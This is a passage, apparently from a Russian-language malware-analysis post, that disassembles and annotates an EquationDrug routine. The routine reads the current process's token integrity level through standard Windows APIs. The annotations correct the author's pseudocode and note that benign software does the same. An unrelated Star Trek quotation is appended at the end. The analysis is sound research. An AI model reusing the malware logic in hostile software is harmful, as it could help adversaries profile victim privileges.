sub_401CA0 endp

*/

Чтение уровня целостности токена (EquationDrug): класс 0x19 = TokenIntegrityLevel, доступ 0x18 = TOKEN_QUERY | TOKEN_QUERY_SOURCE, ошибка 0x7A = ERROR_INSUFFICIENT_BUFFER (ожидаемый результат первого, «измерительного» вызова GetTokenInformation). Листинг на этой странице обрывается после проверки кода ошибки; остальное — описание автора.

Код:
/*
void sub_402000()
{
TokenInformation = 0;
ReturnLength = 0;
TokenHandle = 0;
var_4 = 0;
var_4 = 1;
OpenProcessToken(GetCurrentProcess(), 0x18, &TokenHandle)
GetTokenInformation(&TokenHandle, 0x19, 0, 0, &ReturnLength);
LocalAlloc(0, ReturnLength);
TokenInformation=0;
GetTokenInformation(TokenHandle, 0x19, TokenInformation, ReturnLength, ReturnLength);
GetSidSubAuthorityCount(TokenInformation);
GetSidSubAuthority(TokenInformation, nSubAuthority);
}
*/
Код:
/*
; Attributes: bp-based frame

sub_402000 proc	near
;-----------------------------------------------------------------------
; sub_402000 - reads the integrity level of the current process's token.
; Result (visible part): var_24 = last sub-authority (RID) of the token's
;   mandatory-label SID if it is 1000h/2000h/3000h/4000h, else -1.
;   var_24 is never copied to eax in this listing; the epilogue lives in the
;   chunks at 0040217A / 0040219A and in sub_40214B, none of which are shown,
;   so how the value reaches the caller cannot be read from here.
; Frame: bp-based, with an exception-registration record pushed in the
;   prolog and linked at fs:[0] (looks like the MSVC EH prolog - confirm).
; Calls: GetCurrentProcess, OpenProcessToken, GetTokenInformation (x2),
;   LocalAlloc, GetSidSubAuthorityCount, GetSidSubAuthority, GetLastError.
; NOTE(review): no LocalFree appears in this body, so the LocalAlloc buffer
;   leaks unless sub_40214B releases it - confirm in that routine.
; The same API sequence is used by benign software to learn its own
; integrity level; by itself it is not a distinguishing indicator.
;-----------------------------------------------------------------------

var_2C=	dword ptr -2Ch		; GetLastError() result of the size-probe call
TokenHandle= dword ptr -28h	; HANDLE filled in by OpenProcessToken
var_24=	dword ptr -24h		; result: integrity RID, or -1 (0FFFFFFFFh)
TokenInformation= dword	ptr -20h	; LocalAlloc'd TOKEN_MANDATORY_LABEL buffer
ReturnLength= dword ptr	-1Ch	; byte count needed / returned by GetTokenInformation
var_18=	dword ptr -18h		; saved esp after the pushes (unwinding)
var_10=	dword ptr -10h		; previous fs:[0] link, written by "push eax" below
var_4= dword ptr -4		; first slot of the pushed record; toggled 0 -> 1 -> 0
				; around the body (presumably the EH state index - confirm)

; FUNCTION CHUNK AT 0040217A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0040219A SIZE 00000014 BYTES

; --- prolog: frame pointer + exception-registration record at [ebp-10h..ebp-4] ---
push	ebp
mov	ebp, esp
push	0FFFFFFFFh		; [ebp-4]   = var_4, initial value -1
push	offset unk_409250	; [ebp-8]   data table used by the handler (contents not shown)
push	offset sub_407BC0	; [ebp-0Ch] handler routine
mov	eax, large fs:0		; eax = current head of the SEH chain
push	eax			; [ebp-10h] = var_10: link to the previous record
mov	large fs:0, esp		; install this record as the new chain head
add	esp, 0FFFFFFE4h		; esp -= 1Ch: locals ebp-14h .. ebp-2Ch
push	ebx			; preserve callee-saved registers
push	esi
push	edi
mov	[ebp+var_18], esp	; remember esp for the unwinder
mov	[ebp+var_24], 0FFFFFFFFh	; result defaults to -1
mov	[ebp+TokenInformation],	0
mov	[ebp+ReturnLength], 0
mov	[ebp+TokenHandle], 0
mov	[ebp+var_4], 0		; state 0
mov	[ebp+var_4], 1		; state 1: body begins

TokenInformation = 0;
ReturnLength = 0;
TokenHandle = 0;
var_4 = 0;
var_4 = 1;

; --- step 1: open the current process's own token ---
lea	eax, [ebp+TokenHandle]
push	eax		; TokenHandle (out)
push	18h		; DesiredAccess = TOKEN_QUERY (8) | TOKEN_QUERY_SOURCE (10h)
call	ds:GetCurrentProcess
push	eax		; ProcessHandle (pseudo-handle of this process)
call	ds:OpenProcessToken ; Open the access token associated with a process

OpenProcessToken(GetCurrentProcess(), 0x18, &TokenHandle)


test	eax, eax
jz	loc_402137		; failed -> GetLastError, then leave
; --- step 2: size probe with a NULL buffer; class 19h = TokenIntegrityLevel (25) ---
lea	ecx, [ebp+ReturnLength]
push	ecx		; ReturnLength (out)
push	0		; TokenInformationLength = 0
push	0		; TokenInformation = NULL
push	19h		; TokenInformationClass = TokenIntegrityLevel
mov	edx, [ebp+TokenHandle]
push	edx		; TokenHandle, passed by value
call	ds:GetTokenInformation ; Get specified type of information
			; about	an access token

GetTokenInformation(&TokenHandle, 0x19, 0, 0, &ReturnLength);
; NOTE: the sketch above is off - the handle is pushed by value
; (mov edx,[ebp+TokenHandle] / push edx), i.e. GetTokenInformation(TokenHandle, ...).

test	eax, eax
jnz	loc_40212F		; unexpected success with a 0-byte buffer -> leave
call	ds:GetLastError
mov	[ebp+var_2C], eax
cmp	[ebp+var_2C], 7Ah	; 7Ah = 122 = ERROR_INSUFFICIENT_BUFFER (the expected outcome)
jnz	loc_40212D		; any other error -> leave without allocating
mov	eax, [ebp+ReturnLength]
push	eax		; uBytes = size reported by the probe
push	0		; uFlags = LMEM_FIXED
call	ds:LocalAlloc

LocalAlloc(0, ReturnLength);


mov	[ebp+TokenInformation],	eax	; TokenInformation = LocalAlloc(...)
cmp	[ebp+TokenInformation],	0

TokenInformation=0;
; NOTE: the sketch above is off - this is the assignment of LocalAlloc's
; result followed by a NULL check, not an assignment of zero.

jz	short loc_40212D	; allocation failed -> leave
; --- step 3: the real query into the allocated buffer ---
lea	ecx, [ebp+ReturnLength]
push	ecx		; ReturnLength (address)
mov	edx, [ebp+ReturnLength]
push	edx		; TokenInformationLength = size from the probe
mov	eax, [ebp+TokenInformation]
push	eax		; TokenInformation
push	19h		; TokenInformationClass = TokenIntegrityLevel
mov	ecx, [ebp+TokenHandle]
push	ecx		; TokenHandle
call	ds:GetTokenInformation ; Get specified type of information
			; about	an access token

GetTokenInformation(TokenHandle, 0x19, TokenInformation, ReturnLength, ReturnLength);
; (last argument is &ReturnLength - see the lea above)

test	eax, eax
jz	short loc_402127	; failed -> GetLastError, leave (buffer not freed here)
; --- step 4: last sub-authority of the label SID = integrity RID ---
mov	edx, [ebp+TokenInformation]
mov	eax, [edx]		; first dword of TOKEN_MANDATORY_LABEL = Label.Sid
push	eax		; pSid
call	ds:GetSidSubAuthorityCount	; returns PUCHAR to the count byte

GetSidSubAuthorityCount(TokenInformation);

movzx	ecx, byte ptr [eax]	; ecx = *count
sub	ecx, 1			; index of the last sub-authority
movzx	edx, cl			; truncated back to 8 bits (a count of 0 would yield 0FFh)
push	edx		; nSubAuthority = count - 1
mov	eax, [ebp+TokenInformation]
mov	ecx, [eax]		; Label.Sid again
push	ecx		; pSid
call	ds:GetSidSubAuthority	; returns PDWORD to that sub-authority

GetSidSubAuthority(TokenInformation, nSubAuthority);

mov	edx, [eax]		; edx = RID value
mov	[ebp+var_24], edx	; var_24 = RID
; --- step 5: accept only the four well-known mandatory levels ---
; (each jnz/jmp pair is a plain if/else chain; the unoptimized shape
;  suggests a non-optimized build - confirm)
cmp	[ebp+var_24], 1000h	; SECURITY_MANDATORY_LOW_RID
jnz	short loc_4020FD
jmp	short loc_402125	; match -> keep RID

loc_4020FD:
cmp	[ebp+var_24], 2000h	; SECURITY_MANDATORY_MEDIUM_RID
jnz	short loc_402108
jmp	short loc_402125

loc_402108:
cmp	[ebp+var_24], 3000h	; SECURITY_MANDATORY_HIGH_RID
jnz	short loc_402113
jmp	short loc_402125

loc_402113:
cmp	[ebp+var_24], 4000h	; SECURITY_MANDATORY_SYSTEM_RID
jnz	short loc_40211E
jmp	short loc_402125

loc_40211E:
mov	[ebp+var_24], 0FFFFFFFFh	; not one of the four -> -1

loc_402125:
jmp	short loc_40212D

loc_402127:			; second GetTokenInformation failed
call	ds:GetLastError		; result discarded

loc_40212D:			; common exit: probe error / alloc failure / done
jmp	short loc_402135

loc_40212F:			; probe call unexpectedly succeeded
call	ds:GetLastError		; result discarded

loc_402135:
jmp	short loc_40213D

loc_402137:			; OpenProcessToken failed
call	ds:GetLastError		; result discarded

loc_40213D:			; common epilogue entry
mov	[ebp+var_4], 0		; state back to 0
call	sub_40214B		; separate routine, not in this listing
jmp	short loc_40217A	; rest of the epilogue is in the chunk at 0040217A (not shown)
sub_402000 endp


*/
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"